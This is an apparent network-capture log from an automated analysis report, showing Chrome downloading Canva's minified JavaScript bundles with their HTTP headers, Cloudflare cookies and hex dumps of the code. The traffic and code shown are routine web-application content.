                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 29 2c 6e 2e 64 28 65 2c 22 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 29 29 2c 6e 2e 64 28 65 2c 22 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 29 29 3b 76 61 72 20 72 3d 6e 28 31 29 2c 6f 3d 6e 2e 6e 28 72 29 2c 69 3d 6e 28 31 30 29 2c 61 3d 6e 2e 6e 28 69 29 2c 75 3d 6e 28 31 37 29 2c 63 3d 6e 2e 6e 28 75 29 2c 73 3d 6e 28 32 29 2c 6c 3d 6e 28 35 29 2c 66 3d 6e 28 33 29 2c 68 3d 6e 28 39 29 2c 70 3d 6e 28 36 29 2c 64 3d 6e 28 32 35 29 2c 79 3d 6e 28 31 31 29 2c 76 3d 6e 28 32 30 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 74 29 7b 72 65 74 75 72 6e 20 62 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f
                                                                                                                                                                                                                                                                    Data Ascii: ),n.d(e,"d",(function(){return x})),n.d(e,"a",(function(){return N}));var r=n(1),o=n.n(r),i=n(10),a=n.n(i),u=n(17),c=n.n(u),s=n(2),l=n(5),f=n(3),h=n(9),p=n(6),d=n(25),y=n(11),v=n(20);function b(t){return b="function"==typeof Symbol&&"symbol"==typeof Symbo
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 74 2c 65 29 7b 28 6e 75 6c 6c 3d 3d 65 7c 7c 65 3e 74 2e 6c 65 6e 67 74 68 29 26 26 28 65 3d 74 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 65 29 3b 6e 3c 65 3b 6e 2b 2b 29 72 5b 6e 5d 3d 74 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f
                                                                                                                                                                                                                                                                    Data Ascii: () method.")}()}function w(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function _(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),O
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 64 3d 74 68 69 73 2e 74 68 65 6d 65 2e 61 64 64 4d 6f 64 75 6c 65 28 22 63 6c 69 70 62 6f 61 72 64 22 29 2c 74 68 69 73 2e 68 69 73 74 6f 72 79 3d 74 68 69 73 2e 74 68 65 6d 65 2e 61 64 64 4d 6f 64 75 6c 65 28 22 68 69 73 74 6f 72 79 22 29 2c 74 68 69 73 2e 75 70 6c 6f 61 64 65 72 3d 74 68 69 73 2e 74 68 65 6d 65 2e 61 64 64 4d 6f 64 75 6c 65 28 22 75 70 6c 6f 61 64 65 72 22 29 2c 74 68 69 73 2e 74 68 65 6d 65 2e 69 6e 69 74 28 29 2c 74 68 69 73 2e 65 6d 69 74 74 65 72 2e 6f 6e 28 66 2e 61 2e 65 76 65 6e 74 73 2e 45 44 49 54 4f 52 5f 43 48 41 4e 47 45 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 3d 3d 66 2e 61 2e 65 76 65 6e 74 73 2e 54 45 58 54 5f 43 48 41 4e 47 45 26 26 6e 2e 72 6f 6f 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 71 6c
                                                                                                                                                                                                                                                                    Data Ascii: d=this.theme.addModule("clipboard"),this.history=this.theme.addModule("history"),this.uploader=this.theme.addModule("uploader"),this.theme.init(),this.emitter.on(f.a.events.EDITOR_CHANGE,(function(t){t===f.a.events.TEXT_CHANGE&&n.root.classList.toggle("ql
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 6b 65 79 3a 22 64 69 73 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 65 28 21 31 29 7d 7d 2c 7b 6b 65 79 3a 22 65 64 69 74 52 65 61 64 4f 6e 6c 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 61 6c 6c 6f 77 52 65 61 64 4f 6e 6c 79 45 64 69 74 73 3d 21 30 3b 76 61 72 20 65 3d 74 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 6c 6c 6f 77 52 65 61 64 4f 6e 6c 79 45 64 69 74 73 3d 21 31 2c 65 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                                                                    Data Ascii: key:"disable",value:function(){this.enable(!1)}},{key:"editReadOnly",value:function(t){this.allowReadOnlyEdits=!0;var e=t();return this.allowReadOnlyEdits=!1,e}},{key:"enable",value:function(){var t=!(arguments.length>0&&void 0!==arguments[0])||arguments[
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 30 3b 69 66 28 21 28 65 3d 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 2e 67 65 74 42 6f 75 6e 64 73 28 74 2c 6e 29 3a 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 2e 67 65 74 42 6f 75 6e 64 73 28 74 2e 69 6e 64 65 78 2c 74 2e 6c 65 6e 67 74 68 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 72 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 62 6f 74 74 6f 6d 3a 65 2e 62 6f 74 74 6f 6d 2d 72 2e 74 6f 70 2c 68 65 69 67 68 74 3a 65 2e 68 65 69 67 68 74 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2c 72 69 67 68 74 3a 65 2e 72 69
                                                                                                                                                                                                                                                                    Data Ascii: ments[1]?arguments[1]:0;if(!(e="number"==typeof t?this.selection.getBounds(t,n):this.selection.getBounds(t.index,t.length)))return null;var r=this.container.getBoundingClientRect();return{bottom:e.bottom-r.top,height:e.height,left:e.left-r.left,right:e.ri


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    52192.168.2.1249776104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC615OUTGET /web/3eff736f43ef8805.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 5961
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510bf8de42cf-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "2011b7a377f83ae563a227efe5de3a62"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: PTt8+K2SMiNUyZIRKXnaHhAB+jSKtzeM/sckReM4TO9jcUk+ZlKdX1S8Y+9HlsJVWWy9iC5yxBk=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HMB21HKVR97W2
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 6qNmtAZjF9YdykPAmLl6MxRj62RVrlOp
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC346INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4f 58 4b 71 59 64 69 6b 77 55 73 53 44 59 62 4a 39 49 6f 37 68 65 65 4a 56 38 4f 55 36 7a 6b 6c 70 57 53 45 33 77 73 4b 66 4f 78 62 77 58 63 51 71 66 75 78 74 54 70 46 4f 49 62 78 76 57 7a 49 57 74 64 77 41 44 45 78 6a 43 36 77 71 38 6e 6c 63 4f 49 30 74 52 6f 61 6b 38 36 47 4f 75 44 51 4c 4e 73 48 77 39 34 4a 41 44 6f 46 62 48 57 36 61 54 72 73 65 38 74 4c 79 71 54 7a 46 67 42 4b 52 25 32 46 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXKqYdikwUsSDYbJ9Io7heeJV8OU6zklpWSE3wsKfOxbwXcQqfuxtTpFOIbxvWzIWtdwADExjC6wq8nlcOI0tRoak86GOuDQLNsHw94JADoFbHW6aTrse8tLyqTzFgBKR%2FY%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 38 34 37 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 32 33 38 30 38 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6847],{/***/ 523808:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 65 2e 74 61 62 6c 65 28 65 29 3b 0a 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64 28 29 3b 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 28 29 3b 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64 28 29 3b 61 2e 4b 77 61 2e 61 64 64 28 62 2e 71 70 28 29 2e 73 70 61 6e 49 64 29 7d 2c 53 35 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 6f 58 61 2e 75 6e 73 68 69 66 74 28 62 29 3b 72 65 74 75 72 6e 20 61 7d 2c 66 4b 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 3d 21 31 29 7b 62 2e 61 62 6f 72 74 65 64 7c 7c 64 7c 7c 21 62 2e 63 45 28 29 7c 7c 28 63 2e 70 75 73 68 28 62 29 2c 62 2e 44 55 2e 66 6f 72 45 61 63 68 28 65 3d 3e 63 2e 70 75 73 68 28 65 29 29 29 3b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 62
                                                                                                                                                                                                                                                                    Data Ascii: e.table(e);console.groupEnd();null===c||void 0===c?void 0:c();console.groupEnd();a.Kwa.add(b.qp().spanId)},S5=function(a,b){a.oXa.unshift(b);return a},fKc=function(a,b,c,d=!1){b.aborted||d||!b.cE()||(c.push(b),b.DU.forEach(e=>c.push(e)));for(const e of b
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 69 64 20 30 21 3d 3d 65 3f 65 3a 49 6e 66 69 6e 69 74 79 7d 7d 3b 76 61 72 20 69 4b 63 3d 28 7b 76 7a 62 3a 61 2c 75 72 6c 3a 62 7d 29 3d 3e 63 3d 3e 7b 63 6f 6e 73 74 20 64 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 63 29 2c 65 3d 7b 41 63 63 65 70 74 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 2c 67 29 3d 3e 7b 6c 65 74 20 68 3b 63 6f 6e 73 74 20 6b 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 6c 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 68 3d 21 30 3b 6b 2e 61 62 6f 72 74 28 29 7d 2c 61 29 3b 6b 2e 6f 70 65 6e 28 22 50 4f 53 54 22 2c 62 29 3b
                                                                                                                                                                                                                                                                    Data Ascii: id 0!==e?e:Infinity}};var iKc=({vzb:a,url:b})=>c=>{const d=JSON.stringify(c),e={Accept:"application/json","Content-Type":"application/json"};return new Promise((f,g)=>{let h;const k=new XMLHttpRequest,l=setTimeout(()=>{h=!0;k.abort()},a);k.open("POST",b);
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 4f 32 28 29 3b 61 77 61 69 74 20 74 68 69 73 2e 67 6d 2e 66 6c 75 73 68 28 29 7d 4f 32 28 29 7b 74 72 79 7b 74 68 69 73 2e 67 6d 2e 70 72 6f 63 65 73 73 28 74 68 69 73 2e 62 75 66 66 65 72 29 7d 63 61 74 63 68 28 61 29 7b 74 68 69 73 2e 47 2e 4c 61 28 61 2c 7b 66 64 3a 60 46 61 69 6c 65 64 20 74 6f 20 65 78 70 6f 72 74 20 74 68 65 20 73 70 61 6e 20 62 75 66 66 65 72 20 66 72 6f 6d 20 24 7b 6c 4b 63 2e 6e 61 6d 65 7d 60 2c 65 78 74 72 61 3a 6e 65 77 20 4d 61 70 28 5b 2e 2e 2e 5f 5f 63 2e 6e 63 28 74 68 69 73 2e 62 75 66 66 65 72 29 2c 5b 22 6d 61 78 42 61 74 63 68 53 69 7a 65 22 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 64 67 61 5d 2c 5b 22 6d 61 78 42 61 74 63 68 69 6e 67 54 69 6d 65 4d 73 22 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 65 67 61 5d 5d 29 7d 29 7d
                                                                                                                                                                                                                                                                    Data Ascii: O2();await this.gm.flush()}O2(){try{this.gm.process(this.buffer)}catch(a){this.G.La(a,{fd:`Failed to export the span buffer from ${lKc.name}`,extra:new Map([...__c.nc(this.buffer),["maxBatchSize",this.config.dga],["maxBatchingTimeMs",this.config.ega]])})}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC485INData Raw: 70 6f 69 6e 74 2c 0a 6e 61 76 69 67 61 74 6f 72 7d 29 2c 66 3d 61 73 79 6e 63 20 6c 3d 3e 7b 74 72 79 7b 61 77 61 69 74 20 65 28 6c 29 7d 63 61 74 63 68 28 6d 29 7b 72 65 74 75 72 6e 20 6d 20 69 6e 73 74 61 6e 63 65 6f 66 20 54 35 3f 62 2e 62 5f 28 6e 65 77 20 5f 5f 63 2e 67 63 28 6d 2e 6d 65 73 73 61 67 65 2c 2e 30 31 29 2c 6d 2e 48 29 3a 62 2e 4c 61 28 6d 29 2c 64 28 6c 29 7d 7d 3b 76 61 72 20 67 2c 68 2c 6b 3b 72 65 74 75 72 6e 20 53 35 28 63 2c 6c 3d 3e 6e 65 77 20 6c 4b 63 28 6c 2c 7b 64 67 61 3a 6e 75 6c 6c 21 3d 3d 28 67 3d 61 2e 64 67 61 29 26 26 76 6f 69 64 20 30 21 3d 3d 67 3f 67 3a 32 30 2c 65 67 61 3a 6e 75 6c 6c 21 3d 3d 28 68 3d 61 2e 65 67 61 29 26 26 76 6f 69 64 20 30 21 3d 3d 68 3f 68 3a 31 45 33 7d 2c 62 29 29 2e 62 75 69 6c 64 28 6e 65
                                                                                                                                                                                                                                                                    Data Ascii: point,navigator}),f=async l=>{try{await e(l)}catch(m){return m instanceof T5?b.b_(new __c.gc(m.message,.01),m.H):b.La(m),d(l)}};var g,h,k;return S5(c,l=>new lKc(l,{dga:null!==(g=a.dga)&&void 0!==g?g:20,ega:null!==(h=a.ega)&&void 0!==h?h:1E3},b)).build(ne


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    53192.168.2.1249778104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC622OUTGET /web/90a9bc138217d6b7.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1191INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:40 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 79912
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510e695842b8-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 568099
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "451f69d7c6a992ff4c166bd5ad4c1540"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:26 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 14 Nov 2024 00:48:59 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 15 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 9lvTeIt44JjoiEg/3XicZOO5q2N92KpBOj7HLoeCxT00eHQ+7Ljib5WpirDCMCaCG3Zld6CipSU=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: VN0MNQN2R15DTA34
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: C3234CVkFH3TyddnM1iwkqN.nqg9Dxqb
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 34 31 67 6a 4a 62 6f 65 67 6d 52 66 6f 59 71 39 4f 6d 6a 39 59 48 4e 66 77 42 36 65 77 79 53 6c 66 4b 52 34 43 6a 4b 25 32 46 65 78 71 57 56 33 6b 53 4a 25 32 46 58 52 73 62 31 62 52 25 32 46 57 32 64 36 67 73 6a 51 4a 79 58 31 56 77 77 61 4b 42 55 65 43 35 57 45 71 75 69 36 74 41 30 4d 43 73 65 6c 61 48 62 7a 79 6c 6f 53 59 78 6a 38 51 76 68 35 45 54 6f 46 5a 31 31 39 42 65 79 50 36 41 55 72 4d 45 65 25 32 46 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41gjJboegmRfoYq9Omj9YHNfwB6ewySlfKR4CjK%2FexqWV3kSJ%2FXRsb1bR%2FW2d6gsjQJyX1VwwaKBUeC5WEqui6tA0MCselaHbzyloSYxj8Qvh5EToFZ119BeyP6AUrMEe%2Fg%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 33 31 38 5d 2c 7b 37 30 30 33 35 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 4d 61 74 68 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6f 2c 75 3d 22 22 2c 63 3d 74 25 32 36 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 75 2b 3d 28 65 3d 63 2c 36 35 3c 3d 28 6f 3d 28 72 3d 6e 2e 63 68 61 72 41 74 28 69 29 29 2e 63 68 61 72 43 6f 64 65 41 74 28 29 29 26 26 6f 3c 3d 39 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28
                                                                                                                                                                                                                                                                    Data Ascii: (self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[4318],{700354:function(n,t){!function(n){var t=Math;function r(n,t){for(var r,e,o,u="",c=t%26,i=0;i<n.length;i++)u+=(e=c,65<=(o=(r=n.charAt(i)).charCodeAt())&&o<=90?String.fromCharCode((
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: a9 72 4a ca 8c c5 95 c6 93 4e 67 c7 b6 6f c6 b1 c5 85 73 c9 a7 c6 84 c6 a1 79 62 c5 b7 c6 88 c4 b2 67 68 c9 83 79 ca b8 c4 96 55 72 76 74 75 c5 b4 70 cc 88 c9 9f cb b2 71 67 c5 95 62 c7 82 c7 8d cc 8c cc 8e c5 b4 cc 98 c7 83 c4 aa cc 94 cc 96 c6 88 c9 84 c8 bb 79 cc 8b cc 8d cc 8f cc a3 c4 9e c4 8b cc a1 75 ca 90 61 ca 9c cc 86 72 ca 9f c4 8e ca a2 cc b2 c4 8c 6e ca a6 c7 95 c4 96 c9 9f 51 c7 b2 c4 93 c9 9f c9 8c c6 90 cc 93 c4 85 71 62 6a 3f 6f ca b4 71 ca b6 cc 92 c4 96 ca ba cb 8b cc bc 65 c5 84 ca bb c9 81 61 cd 90 c8 b8 62 62 cb 9f cd 8b c4 98 cb 87 62 c6 ad cd 9f c5 94 c4 8f 66 c4 85 c5 95 c4 b1 c4 a3 c4 8f c4 b2 61 32 cd aa c4 a3 c5 95 70 6f c8 b6 cd 82 c6 ad c7 95 cd a3 c5 b2 63 2c cd b8 7a 31 2c cc 80 c7 a8 cd bf 31 30 cd be 62 74 31 cd b9 cd a5
